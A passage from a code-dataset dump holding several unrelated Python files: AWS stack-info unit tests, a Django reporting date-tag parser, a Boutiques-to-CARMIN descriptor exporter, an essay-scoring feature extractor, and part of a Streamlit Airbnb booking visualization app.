mock_physical_resource_id_1\n mock_resource_1.logical_id = mock_logical_resource_id_1\n mock_resource_1.type = 'AWS::CloudFormation::Stack'\n mock_resource_2 = mock.MagicMock()\n mock_resource_2.physical_id = mock_physical_resource_id_2\n mock_resource_2.logical_id = mock_logical_resource_id_2\n mock_resource_2.type = 'AWS::CloudFormation::Stack'\n mock_resource_3 = mock.MagicMock()\n mock_resource_3.physical_id = 'not-used'\n mock_resource_3.logical_id = 'not-used'\n mock_resource_3.type = 'not-a-stack'\n mock_resource_4 = mock.MagicMock()\n mock_resource_4.physical_id = 'not-used'\n mock_resource_4.logical_id = 'not-used'\n mock_resource_4.type = 'not-a-stack'\n mock_resources = [ \n mock_resource_3,\n mock_resource_1,\n mock_resource_4,\n mock_resource_2\n ]\n mock_resource_group_1 = 'test-resource-group-1'\n mock_resource_group_2 = 'test-resource-group-2'\n mock_resource_groups = [ mock_resource_group_1, mock_resource_group_2 ]\n with mock.patch('stack_info.ResourceGroupInfo', side_effect = mock_resource_groups) as mock_ResourceGroupInfo:\n with mock.patch('stack_info.DeploymentInfo.resources', new_callable=mock.PropertyMock, return_value=mock_resources):\n target = stack_info.DeploymentInfo(MOCK_STACK_ARN, client=MOCK_CLIENT)\n actual_resource_groups = target.resource_groups\n self.assertItemsEqual(actual_resource_groups, mock_resource_groups)\n mock_ResourceGroupInfo.assert_any_call(mock_physical_resource_id_1, resource_group_name=mock_logical_resource_id_1, client=target.client, deployment_info=target)\n mock_ResourceGroupInfo.assert_any_call(mock_physical_resource_id_2, resource_group_name=mock_logical_resource_id_2, client=target.client, deployment_info=target)\n\n\nclass Test_stack_info_DeploymentAccessInfo(unittest.TestCase):\n\n def test_constructor(self):\n target = stack_info.DeploymentAccessInfo(MOCK_STACK_ARN, client = MOCK_CLIENT, stack_description = MOCK_STACK_DESCRIPTION)\n self.assertEquals(target.stack_type, stack_info.StackInfo.STACK_TYPE_DEPLOYMENT_ACCESS)\n self.assertIs(target.client, MOCK_CLIENT)\n self.assertIs(target.stack_description, MOCK_STACK_DESCRIPTION)\n\n def test_deployment_provided(self):\n mock_deployment = 'test-deployment-stack-info'\n target = stack_info.DeploymentAccessInfo(MOCK_STACK_ARN, deployment_info = mock_deployment)\n self.assertEquals(target.deployment, mock_deployment)\n\n def test_deployment_discovered(self):\n mock_deployment_stack_arn = 'test-deployment-stack-arn'\n mock_client = 'mock_client'\n mock_deployment = 'test-deployment-info'\n mock_parameters = { 'DeploymentStackArn': mock_deployment_stack_arn }\n with mock.patch('stack_info.DeploymentInfo', return_value=mock_deployment) as mock_DeploymentInfo:\n with mock.patch('stack_info.DeploymentAccessInfo.parameters', new = mock.PropertyMock( return_value = mock_parameters )):\n target = stack_info.DeploymentAccessInfo(MOCK_STACK_ARN, client = mock_client)\n actual_deployment = target.deployment\n actual_deployment_2 = target.deployment\n self.assertIs(actual_deployment, mock_deployment)\n self.assertIs(actual_deployment_2, mock_deployment)\n mock_DeploymentInfo.assert_called_once_with(mock_deployment_stack_arn, deployment_access_info = target, client = mock_client)\n\n\n\nclass Test_stack_info_ResourceGroupInfo(unittest.TestCase):\n\n def test_constructor(self):\n target = stack_info.ResourceGroupInfo(MOCK_STACK_ARN, client = MOCK_CLIENT, stack_description = MOCK_STACK_DESCRIPTION)\n self.assertEquals(target.stack_type, stack_info.StackInfo.STACK_TYPE_RESOURCE_GROUP)\n self.assertIs(target.client, MOCK_CLIENT)\n self.assertIs(target.stack_description, MOCK_STACK_DESCRIPTION)\n\n def test_resource_group_name_provided(self):\n mock_resource_group_name = 'test_resource_group_name'\n target = stack_info.ResourceGroupInfo(MOCK_STACK_ARN, resource_group_name = mock_resource_group_name)\n self.assertEquals(target.resource_group_name, mock_resource_group_name)\n\n def test_resource_group_name_discovered(self):\n mock_resource_group_name = 'test-name'\n mock_parameters = { 'ResourceGroupName': mock_resource_group_name }\n with mock.patch('stack_info.ResourceGroupInfo.parameters', new = mock.PropertyMock( return_value = mock_parameters )):\n target = stack_info.ResourceGroupInfo(MOCK_STACK_ARN)\n actual_resource_group_name = target.resource_group_name\n self.assertEquals(actual_resource_group_name, mock_resource_group_name)\n\n def test_deployment_provided(self):\n mock_deployment = 'test_deployment'\n target = stack_info.ResourceGroupInfo(MOCK_STACK_ARN, deployment_info = mock_deployment)\n self.assertEquals(target.deployment, mock_deployment)\n\n def test_deployment_discovered(self):\n mock_deployment_stack_id = 'test-deployment-stack-id'\n mock_parameters = { 'DeploymentStackArn': mock_deployment_stack_id }\n mock_deployment = 'test-deployment'\n with mock.patch('stack_info.DeploymentInfo', return_value = mock_deployment) as mock_DeploymentInfo:\n with mock.patch('stack_info.ResourceGroupInfo.parameters', new = mock.PropertyMock( return_value = mock_parameters )):\n target = stack_info.ResourceGroupInfo(MOCK_STACK_ARN)\n actual_deployment = target.deployment\n actual_deployment_2 = target.deployment\n self.assertEquals(actual_deployment, mock_deployment)\n self.assertEquals(actual_deployment_2, mock_deployment)\n mock_DeploymentInfo.assert_called_once_with(mock_deployment_stack_id, client=target.client)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"Lumberyard/1.7.0.0/dev/TestHyperealVR/AWS/project-code/test/test_stack_info.py","file_name":"test_stack_info.py","file_ext":"py","file_size_in_byte":42482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"585495477","text":"import re\n\nfrom django.conf import settings\nfrom dateutil.parser import parse\nfrom datefuncs import *\nfrom make_config import *\n\nMONTHS = ['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec']\n\nMONTH_TAG = re.compile(\"^(\\d{4})M(0[1-9]{1}|10|11|12)$\")\nQUARTER_TAG = re.compile(\"^(\\d{4})Q([1-4]{1})$\")\nQUARTERLY_TAG = re.compile('(\\d{4})(Quarterly)')\nANNUAL_TAG = re.compile('(\\d{4})(Annual)')\nMONTHLY_TAG = re.compile('(\\d{4})(Monthly)')\nDAILY_TAG = re.compile('(daily_)(\\d{4}-\\d{1,2}-\\d{1,2})')\nTRAILING12M_TAG = re.compile('(12Mtrailing)(-?)(\\d{4}-\\d{1,2}-\\d{1,2})?')\nMULTIYEAR_TAG = re.compile('(\\d{1,2})yr_(\\d{4}-\\d{1,2}-\\d{1,2})?')\n\n\ndef extractDateRange(request, inclusive=True):\n \"Common notation to pull out to/from dates. Returns 2 date objects\"\n\n if request.GET.has_key('year'):\n yyyy = int(request.GET.get('year'))\n from_date = start_of_year(yyyy)\n to_date = end_of_year(yyyy)\n if not inclusive:\n from_date = day_before(from_date)\n elif request.GET.has_key('month'):\n smonth = request.GET.get('month')\n syear, smonth = smonth.split('M')\n yyyy = int(syear)\n mm = int(smonth)\n from_date = start_of_month(mm, yyyy)\n to_date = end_of_month(mm, yyyy)\n if not inclusive:\n from_date = day_before(from_date)\n elif request.GET.has_key('period'):\n period = request.GET.get('period')\n if period == 'YTD':\n today = datetime.date.today()\n from_date = start_of_year(today.year)\n to_date = today\n elif period == 'QTD':\n from_date, to_date = QTD(datetime.date.today())\n elif period == 'HTD':\n from_date, to_date = HTD(datetime.date.today())\n elif period == 'MTD':\n from_date, to_date = MTD(datetime.date.today())\n \n if not inclusive:\n from_date = day_before(from_date)\n else:\n from_date = as_date(request.GET.get('from', settings.DATE_EARLY))\n to_date = as_date(request.GET.get('to', settings.DATE_LATE))\n return from_date, to_date\n\n\ndef config_fromcoltag(col_tag, rpt_desc, calc_type):\n\n # annual period by quarter... eg 2016Quarterly\n quarterly_match = QUARTERLY_TAG.search(col_tag)\n if quarterly_match:\n yr = quarterly_match.groups()[0]\n title = yr + ' ' + rpt_desc\n\n if calc_type == 'diff':\n columns, column_titles = quarterly_periods(yr)\n elif calc_type == 'as_of':\n columns, column_titles = quarter_ends(yr)\n return {'title': title, 'columns': dict(zip(column_titles, columns)), 'column_order': column_titles}\n\n annual_match = ANNUAL_TAG.search(col_tag)\n if annual_match:\n yr = annual_match.groups()[0]\n title = yr + ' ' + rpt_desc\n\n if calc_type == 'diff':\n columns, column_titles = annual_periods(yr)\n elif calc_type == 'as_of':\n columns, column_titles = annual_ends(yr)\n return {'title': title, 'columns': dict(zip(column_titles, columns)), 'column_order': column_titles}\n\n \n monthly_match = MONTHLY_TAG.search(col_tag)\n if monthly_match:\n yr = monthly_match.groups()[0]\n title = '%s for %s -- Monthly Detail' %(rpt_desc, yr)\n\n if calc_type == 'diff':\n columns, column_titles = monthly_periods(yr)\n elif calc_type == 'as_of':\n columns, column_titles = monthly_ends(yr)\n return {'title': title, 'columns': dict(zip(column_titles, columns)), 'column_order': column_titles}\n\n daily_match = DAILY_TAG.search(col_tag)\n if daily_match:\n dt = parse(daily_match.groups()[1]).date()\n title = '%s for %s -- Daily view' %(rpt_desc, dt.isoformat())\n columns = [prev_busday(dt), 'D%s' % dt.isoformat(), dt]\n column_titles = ['Yesterday', 'Change', 'Today']\n\n return {'title': title, 'columns': dict(zip(column_titles, columns)), 'column_order': column_titles}\n\n trailing12M_match = TRAILING12M_TAG.search(col_tag)\n if trailing12M_match:\n if trailing12M_match.groups()[2]:\n dt = parse(trailing12M_match.groups()[2]).date()\n else:\n dt = datetime.datetime.today().date()\n\n title = '%s from %s -- trailing 12mth' %(rpt_desc, dt.isoformat())\n if calc_type == 'diff':\n columns, column_titles = trailing_monthly_periods(dt)\n elif calc_type == 'as_of':\n columns, column_titles = trailing_monthly_ends(dt)\n return {'title': title, 'columns': dict(zip(column_titles, columns)), 'column_order': column_titles}\n\n multiyear_match = MULTIYEAR_TAG.search(col_tag)\n if multiyear_match:\n if multiyear_match.groups()[1]:\n dt = parse(multiyear_match.groups()[1]).date()\n else:\n dt = datetime.datetime.today().date()\n\n years = int(multiyear_match.groups()[0])\n\n title = '%s from %s -- %dyr view' %(rpt_desc, dt.isoformat(), years)\n if calc_type == 'diff':\n columns, column_titles = multiyear_periods(dt, years)\n elif calc_type == 'as_of':\n columns, column_titles = multiyear_ends(dt, years)\n return {'title': title, 'columns': dict(zip(column_titles, columns)), 'column_order': column_titles}\n\n month_tag = MONTH_TAG.match(col_tag)\n if month_tag is not None:\n yr = int(month_tag.groups()[0])\n mth = int(month_tag.groups()[1])\n tag_label = '%s %d' % (MONTHS[mth-1], yr)\n\n if calc_type == 'as_of':\n columns, column_titles = single_month_end(mth, yr, col_tag)\n title = '%s for %s' %(rpt_desc, tag_label)\n elif calc_type == 'diff':\n columns = [col_tag]\n column_titles = [tag_label]\n title ='%s for %s' %(rpt_desc, col_tag)\n return {'title': title, 'columns': dict(zip(column_titles, columns)), 'column_order': column_titles}\n\n quarter_tag = QUARTER_TAG.match(col_tag)\n if quarter_tag is not None:\n yr = int(quarter_tag.groups()[0])\n qtr = int(quarter_tag.groups()[1])\n\n tag_label = 'Q%s %d' % (qtr, yr)\n if calc_type == 'as_of':\n columns, column_titles = single_quarter_end(qtr, yr, col_tag)\n title = '%s for %s' %(rpt_desc, tag_label)\n elif calc_type == 'diff':\n columns = [col_tag]\n column_titles = [tag_label]\n title ='%s for %s' %(rpt_desc, col_tag)\n return {'title': title, 'columns': dict(zip(column_titles, columns)), 'column_order': column_titles}\n \n \"\"\"\n # didn't match anything\n raise ValueError('Unexpected col_tag: %s' % repr(col_tag))\n \n except:\n raise ValueError('Unexpected col_tag: %s' % repr(col_tag))\n \"\"\"","sub_path":"accountifie/toolkit/utils/coltags.py","file_name":"coltags.py","file_ext":"py","file_size_in_byte":6738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"422791309","text":"#!/usr/bin/env python\n\n# Copyright 2015 - 2017:\n# The Royal Institution for the Advancement of Learning McGill University,\n# Centre National de la Recherche Scientifique,\n# University of Southern California,\n# Concordia University\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport json\nimport os\nimport uuid\n\nclass Exporter():\n\n def __init__(self, descriptor):\n self.descriptor = descriptor\n\n def convert_type(self, boutiques_type, is_integer=False, is_list=False):\n if is_list:\n return \"List\"\n if boutiques_type == \"Flag\":\n return \"Boolean\"\n if boutiques_type == \"Number\":\n if is_integer:\n return \"Int64\"\n return \"Double\"\n return boutiques_type\n\n def convert_input_or_output(self, input_or_output, is_output):\n param = {}\n param['name'] = input_or_output.get('name')\n param['id'] = input_or_output.get('id')\n if is_output:\n param['type'] = 'File'\n else:\n param['type'] = self.convert_type(input_or_output.get('type'),\n input_or_output.get('integer'),\n input_or_output.get('list'))\n param['isOptional'] = input_or_output.get('optional') or False\n param['isReturnedValue'] = is_output\n if input_or_output.get('default-value'):\n param['defaultValue'] = input_or_output.get('default-value')\n if input_or_output.get('description'):\n param['description'] = input_or_output.get('description')\n return param\n\n def carmin(self, output_file):\n carmin_desc = {}\n with open(self.descriptor, 'r') as fhandle:\n descriptor = json.load(fhandle)\n\n carmin_desc['identifier'] = str(uuid.uuid4())\n carmin_desc['name'] = descriptor.get('name')\n carmin_desc['version'] = descriptor.get('tool-version')\n carmin_desc['description'] = descriptor.get('description')\n carmin_desc['canExecute'] = True\n carmin_desc['parameters'] = []\n for inp in descriptor.get('inputs'):\n carmin_desc['parameters'].append(self.convert_input_or_output(inp,\n False))\n for output in descriptor.get('output-files'):\n carmin_desc['parameters'].append(self.convert_input_or_output(output,\n True))\n carmin_desc['properties'] = {}\n carmin_desc['properties']['boutiques'] = True\n if descriptor.get('tags'):\n for prop in descriptor.get('tags').keys():\n carmin_desc['properties'][prop] = descriptor['tags'][prop]\n carmin_desc['errorCodesAndMessages'] = []\n for errors in descriptor.get('error-codes'):\n obj = {}\n obj['errorCode'] = errors['code']\n obj['errorMessage'] = errors['description']\n carmin_desc['errorCodesAndMessages'].append(obj)\n\n with open(output_file, 'w') as fhandle:\n fhandle.write(json.dumps(carmin_desc, indent=4))\n","sub_path":"tools/python/boutiques/exporter.py","file_name":"exporter.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"436916714","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 23 21:33:32 2018\r\n\r\n@author: lucas\r\n\"\"\"\r\n\r\nfrom sklearn.feature_extraction.text import TfidfTransformer\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nimport scipy\r\nimport re\r\nimport nltk.data\r\nfrom textblob import Word\r\nimport expandContractions as eC\r\nimport discourseMarkers\r\nimport Prompts\r\nimport spacy\r\n\r\n\r\n\r\n\r\ndef pre_process(essay):\r\n \r\n \"\"\"Função que expande contrações, põe em caixa baixa e retira whitespace a mais\"\"\"\r\n \r\n essay_proc = eC.expandContractions(essay.lower())\r\n essay_proc = re.sub(' +', ' ',essay_proc)\r\n return essay_proc\r\n\r\ndef token_features(essay):\r\n \r\n \"\"\" Utiliza o objeto Vectorizer para extrair features relacionados a tokens\"\"\"\r\n vector = CountVectorizer()\r\n tokenized_essay = vector.fit_transform([essay])\r\n \r\n \"\"\"Feature 1: Número de Tokens\"\"\"\r\n nb_of_tokens = tokenized_essay.toarray().sum()\r\n \r\n \"\"\"Feature 2: Media de caracteres por palavra\"\"\"\r\n nb_of_char = 0\r\n for position,item in enumerate(vector.get_feature_names()):\r\n nb_of_char += len(item)* tokenized_essay.toarray()[0][position]\t\t\t# multiplica o tamanho da string(token) pela sua frequência\r\n mean_char_p_word = nb_of_char/nb_of_tokens\r\n \r\n \"\"\"Feature 3: Número de palavras diferentes \"\"\"\r\n nb_dif_words = len(vector.get_feature_names())\r\n \r\n return (nb_of_tokens,mean_char_p_word,nb_dif_words)\t\r\n\r\ndef nb_of_speliing_errors(essay):\r\n \r\n \"\"\"Feature 4: Utiliza a bilbioteca textblob para correção de erros de ortografia\"\"\"\r\n essay = re.sub('@\\S+','',essay) # Retira nomes padrão do ASAP iniciados em @\r\n \r\n vector = CountVectorizer()\r\n vector.fit_transform([essay])\r\n \r\n list_tokens = vector.get_feature_names()\r\n \r\n spell_errors = 0 \r\n for i in list_tokens:\r\n __result = None\r\n __result = re.search('@\\S+', i) \t\t\t\t\t\t\t\t\t\t# retira nomes padrão do ASAP como @Location\r\n if __result is None:\r\n w = Word(i)\t\t\t\t\t\t\t\t\t\t\t\t\t\t # da biblioteca textblob\r\n result_tuple = w.spellcheck()\t\t\t\t\t\t\t\t\t # o método spellcheck() returna uma tupla com a sugestão de correção e o nível de certeza em %\r\n if i != result_tuple[0][0] and result_tuple[0][1] == 1.0:\t\t\t# só faz correções que o corretor tem certeza, 100%, evita sugestão de singular em formas plurais\r\n spell_errors += 1\r\n nb_of_spell_errors = spell_errors\r\n return nb_of_spell_errors\r\n\r\ndef get_cos_dist(essay,prompt_number):\r\n \r\n \"\"\"Feature 5: Retorna a distância cosseno de dois textos usando Scikit\"\"\"\r\n __vectorizer = CountVectorizer() \t\t \r\n red_promp = [essay,Prompts.get_prompt(prompt_number)] \t\t # O CountVectorizer() cria duas arrays de frequências de palavras do\r\n y = __vectorizer.fit_transform(red_promp) \t\t # vocabulário do essay e do prompt\r\n x = y.toarray()\r\n transformer = TfidfTransformer(smooth_idf=False)\r\n tfidf = transformer.fit_transform(x)\t\t\t\t\t\t\t\t\t\t # Faz as operações do TF.IDF\r\n z = tfidf.toarray()\r\n cosine_distance = scipy.spatial.distance.cosine(z[0], z[1])\r\n return cosine_distance\r\n\r\ndef discourse_markers_features(essay):\r\n \r\n \"\"\"Feature 6: Numero de marcadores de discurso na redação\"\"\"\r\n \r\n counter=0\r\n for discourse_marker in discourseMarkers.multi_word_exp():\r\n result = None\r\n result = discourse_marker.findall(essay)\r\n re.sub(discourse_marker,'',essay)\r\n counter += len(result)\r\n \r\n for discourse_marker in discourseMarkers.discourseMarkers():\r\n matches = None\r\n searchable_pattern = \"\\W\" + discourse_marker + '\\W'\r\n matches = re.findall(searchable_pattern,essay.lower())\r\n if matches != None:\r\n counter += len(matches)\r\n nb_of_discourse_markers = counter\r\n \r\n \"\"\"Feature 7: Número de marcadores de discurso por frase\"\"\"\r\n \r\n sent_detector = nltk.data.load('tokenizers/punkt/english.pickle')\t\t\t\t\t\r\n n_of_sentences = len(sent_detector.tokenize(essay))\r\n discourse_markers_p_sentence = nb_of_discourse_markers/n_of_sentences\r\n \r\n return (nb_of_discourse_markers,discourse_markers_p_sentence)\r\n\r\ndef nb_optimal_sentence(essay):\r\n \r\n \"\"\"Feature 8: Numero de frases com 15 a 20 palavras\"\"\"\r\n counter = 0\r\n sent_detector = nltk.data.load('tokenizers/punkt/english.pickle')\t\t\t\t\t\t# Sentence Tokenizer do NLKT\r\n essay_sentence_list = sent_detector.tokenize(essay)\t\t\t\r\n\t # essay_sentence_list é uma Lista de tokens(frases)\r\n for i in essay_sentence_list:\r\n n_words_sentence = len(i.split())\r\n if n_words_sentence >= 15 and n_words_sentence <= 20:\r\n counter +=1\r\n nb_of_optimal_sentences = counter\r\n return nb_of_optimal_sentences\r\n\r\ndef nb_first_person_pronoun(essay):\r\n \r\n sent_detector = nltk.data.load('tokenizers/punkt/english.pickle')\r\n sentence_nb = len(sent_detector.tokenize(essay))\r\n \r\n fp_prn_nb = 0\r\n f = open(\"./first_person_pronouns.txt\", 'r', encoding = 'utf8')\r\n dict_prn = dict.fromkeys(f.read().lower().split(),None)\r\n\r\n norm_e = re.sub(\"[^a-z]\",' ',essay,flags = re.IGNORECASE)\r\n for i in norm_e.lower().strip().split():\r\n if i in dict_prn:\r\n fp_prn_nb += 1\r\n \r\n return (fp_prn_nb, fp_prn_nb/sentence_nb)\r\n\r\ndef nb_demonstrative_pronoun(essay):\r\n \r\n demon_prn_nb = 0\r\n f = open(\"./demonstrative_pronouns.txt\", 'r', encoding = 'utf8')\r\n dict_prn = dict.fromkeys(f.read().lower().split(),None)\r\n \r\n nlp = spacy.load('en_core_web_sm')\r\n doc = nlp(essay)\r\n \r\n for token in doc:\r\n if token.text in dict_prn and token.pos_ == 'DET':\r\n demon_prn_nb += 1\r\n \r\n return (demon_prn_nb)\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n","sub_path":"ASAP_essay.py","file_name":"ASAP_essay.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"623066702","text":"# -*- coding: utf-8 -*-\n\"\"\" Data Analytics Streamlit Application\n\nModule used to launch data analytics dashboard.\n\nUsage\n-----\n\n>>> import streamlit as st\n>>> from src.visualization_app import visualization\n>>> page = st.sidebar.selectbox(\"Choose a page\", [\"Homepage\", \"Data Analytics\",\n \"Recommendation System\"])\n>>> if page == \"Homepage\":\n>>> ...\n>>> elif page == \"Data Analytics\":\n>>> visualization()\n\n\"\"\"\n\nimport sys\nfrom pathlib import Path\n\nsys.path.insert(0, str(Path(__file__).resolve().parents[1]))\n\nimport streamlit as st\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\n@st.cache(suppress_st_warning=True)\ndef load_data():\n \"\"\" Load dataset for part 1 of our data analytics\n\n Part 1 data analytics is based mainly off of the training set, thus this is the\n dataset that is loaded.\n\n Returns:\n pd.DataFrame: Processed dataset\n\n \"\"\"\n user = pd.read_csv('./airbnb-recruiting-new-user-bookings/train_users_2.csv')\n\n # clean up data\n user = user[(user['age'] < 110) & (user['age'] > 0) & (user['date_first_booking'] != '0')]\n user = user.drop(['signup_flow', 'first_affiliate_tracked'], axis=1)\n user = user.rename(columns={'date_account_created': 'Date of Account Created',\n 'timestamp_first_active': 'Activity Time',\n 'date_first_booking': 'First Booking Date',\n 'gender': 'Gender', 'age': 'Age', 'signup_method': 'Sign Up Method',\n 'language': 'Language', 'affiliate_channel': 'Affiliate Channel',\n 'affiliate_provider': 'Affiliate Provider', 'signup_app': 'Signup Place',\n 'first_device_type': 'Device Type', 'first_browser': 'Browser',\n 'country_destination': 'Country Destination'})\n user_date = user[(user['First Booking Date'] != '0') & (user['Age'] != 0)]\n user_date['Age'] = user_date['Age'].astype(int)\n user_date = user_date[(user_date['Age'] >= 18) & (100 >= user_date['Age'])]\n user_date.dropna(inplace=True)\n format = \"%m/%d/%Y\"\n try:\n user_date['First Booking Date'] = pd.to_datetime(user_date['First Booking Date'],\n format=format)\n except:\n format = \"%Y-%m-%d\"\n user_date['First Booking Date'] = pd.to_datetime(user_date['First Booking Date'],\n format=format)\n\n user_date['First Booking Date'] = user_date['First Booking Date'].apply(lambda y: y.strftime('%Y-%m'))\n user_date['Gender'].replace({0: 'Unknown', 1: 'Male', 2: 'Female'}, inplace=True)\n\n return user_date\n\n\ndef clean_data(x, cou):\n \"\"\" Clean dataframe by removing NA values and keep useful columns.\n\n Args:\n x (pd.DataFrame): Dataset\n cou (list): List of countries\n\n Returns:\n\n \"\"\"\n\n x = x[x['Country Destination'].isin(cou)]\n c_x = x.sort_values(['First Booking Date']).groupby(['First Booking Date', 'Country Destination']).agg(\n 'count').reset_index()\n\n c_x = c_x[['First Booking Date', 'Country Destination', 'id']]\n\n if cou:\n temp = list(c_x[c_x['Country Destination'] == cou[0]]['First Booking Date'])\n\n for i in cou:\n a = set(temp).difference(list(c_x[c_x['Country Destination'] == i]['First Booking Date']))\n for j in a:\n c_x.loc[len(c_x)] = [j, i, 1]\n a = set(list(c_x[c_x['Country Destination'] == i]['First Booking Date'])).difference(temp)\n for j in a:\n c_x.loc[len(c_x)] = [j, cou[0], 1]\n\n c_x.sort_values(by=['First Booking Date'], inplace=True)\n c_x.reset_index(drop=True, inplace=True)\n\n return c_x\n\n\ndef plot_country_time_series(c_x, cou):\n \"\"\"\n Show plot of visited frquency by date with selected countries.\n\n Parameters\n ----------\n c_x: dataframe\n cou: list of countries\n\n \"\"\"\n plt.figure(figsize=(11, 9))\n\n for i in cou:\n if cou is None:\n continue\n data = c_x[c_x['Country Destination'] == i]\n data = data.append(data)\n plt.plot('First Booking Date', 'id', data=c_x[c_x['Country Destination'] == i])\n plt.yscale('log')\n fontsize = 'xx-large'\n\n plt.legend(tuple(cou), fontsize=fontsize)\n plt.xlabel('Bookings from 2010-2015', fontsize=fontsize)\n plt.title('Country Booking Trends', fontsize=fontsize)\n plt.ylabel('Number of Bookings (log)', fontsize=fontsize)\n plt.xticks(np.arange(1, 73, 6), ['Jan-10', 'July-10', 'Jan-11', 'July-11', 'Jan-12', 'July-12',\n 'Jan-13', 'July-13', 'Jan-14', 'July-14',\n 'Jan-15'], fontsize=fontsize, rotation=30)\n plt.yticks(fontsize=fontsize)\n st.pyplot()\n\n\ndef plot_country_most_visited(user_date):\n\n \"\"\"\n Show visualization of visited frquency with selected countries.\n\n Parameters\n ----------\n user_date: dataframe\n\n \"\"\"\n cou = ['US', 'Other', 'FR', 'CA', 'GB', 'ES', 'IT', 'DE', 'NL', 'AU', 'PT']\n # cou=['CA']\n plt.figure(figsize=(10, 5))\n fontsize = 'large'\n a_x = user_date[user_date['Country Destination'].isin(cou)]\n a_x = a_x.groupby(['Country Destination']).agg('count').reset_index()\n a_x = a_x[['Country Destination', 'id']].sort_values(['id'], ascending=False)\n a_x.plot.bar(x='Country Destination', y='id', rot=0, logy=True, legend=False,\n fontsize=fontsize)\n plt.ylabel(\"Total Bookings (logged)\",fontsize=fontsize)\n plt.xlabel('Countries', fontsize=fontsize)\n plt.title('Frequency of Country Bookings from 2010-2015', fontsize=fontsize)\n st.pyplot()\n\n\ndef plot_age(user_date, cou):\n \"\"\"\n Show visualization of visitor demograph with selected countries.\n\n Parameters\n ----------\n user_date: dataframe\n cou: list of countries\n\n \"\"\"\n # cou=['US','Other','FR','CA','GB','ES','IT','DE','NL','AU','PT']\n # cou = ['AU', 'US']\n\n a_x = user_date[user_date['Country Destination'].isin(cou)]\n conditions = [\n (a_x['Age'] >= 18) & (a_x['Age'] <= 30),\n (a_x['Age'] >= 31) & (a_x['Age'] <= 40),\n (a_x['Age'] >= 41) & (a_x['Age'] <= 50),\n (a_x['Age'] >= 51) & (a_x['Age'] <= 60),\n (a_x['Age'] >= 61)]\n choices = ['18-30', '31-40', '41-50', '51-60', '60+']\n a_x['age'] = np.select(conditions, choices)\n a_x = a_x.groupby(['age', 'Gender']).agg('count').reset_index()\n a_x = a_x[['age', 'Gender', 'id']]\n a_x\n plt.figure(figsize=(10, 7))\n c = 0\n t = []\n for i in a_x['Gender'].unique():\n t.append([])\n for j in a_x['age'].unique():\n try:\n temp = a_x[(a_x['age'] == j) & (a_x['Gender'] == i)]['id'].iloc[0]\n t[c].append(temp)\n except:\n print('lol')\n c = c + 1\n\n bar = [1, 2, 3, 4, 5]\n barwidth = 0.8\n mal = plt.bar(bar, t[2], color='#2ECC71', width=barwidth, edgecolor='white')\n fem = plt.bar(bar, t[1], color='#BB8FCE', bottom=t[2], width=barwidth, edgecolor='white')\n unk = plt.bar(bar, t[0], color='#F4D03F', bottom=np.add(t[1], t[2]), width=barwidth, edgecolor='white')\n\n fontsize = 'xx-large'\n plt.ylabel(\"Total\", fontsize=fontsize)\n plt.xlabel('Age Range', fontsize=fontsize)\n plt.title('Age Distribution with Selected Countries', fontsize=fontsize)\n plt.xticks(bar, choices, fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n plt.legend((unk[0], fem[0], mal[0]), ('Unknown', 'Female', 'Male'), fontsize=fontsize)\n st.pyplot()\n\n#@st.cache(suppress_st_warning=True)\ndef load_data_part2():\n \"\"\"\"\n load data for part 2 visualization from session.csv and train_user_2.csv\n\n prepare for further use of making plots in part 2\n\n Returns:\n DataFrame df,\n the session information of users whose desination is known,\n (the intersection between session.csv and train_user_2.csv)\n\n dict device_dic,\n {user_id: device_type}, the device type of each user\n\n dict result_dic,\n {user_id: country_destination}, the destination of each user\n\n dict lang_dic,\n {user_id: language}, the language of each user\n\n \"\"\"\n\n #s_df = pd.read_csv('./airbnb-recruiting-new-user-bookings/sessions.csv')\n t_df = pd.read_csv('./airbnb-recruiting-new-user-bookings/train_users_2.csv')\n\n result_dic = t_df.set_index('id')['country_destination'].to_dict()\n lang_dic = t_df.set_index('id')['language'].to_dict()\n device_dic = t_df.set_index('id')['first_device_type'].to_dict()\n\n #s_df['country_destination'] = s_df.user_id.apply(lambda x: result_dic[x] if x in result_dic.keys() else '0')\n #s_df['lang'] = s_df.user_id.apply(lambda x: lang_dic[x] if x in lang_dic.keys() else '0')\n\n #df = s_df[s_df['country_destination'] != '0']\n\n #return df, device_dic, result_dic, lang_dic\n return device_dic, result_dic, lang_dic\n\n\ndef plot_avg_time_action_type(df, device_dic, result_dic):\n \"\"\"\n plot for part 2.1 what steps are taken for booking a travel destination\n\n Args:\n df (dataframe): the input dataframe that we are going to plot about\n\n device_dic (dict): {user_id: device_type}, the device type of each user\n\n 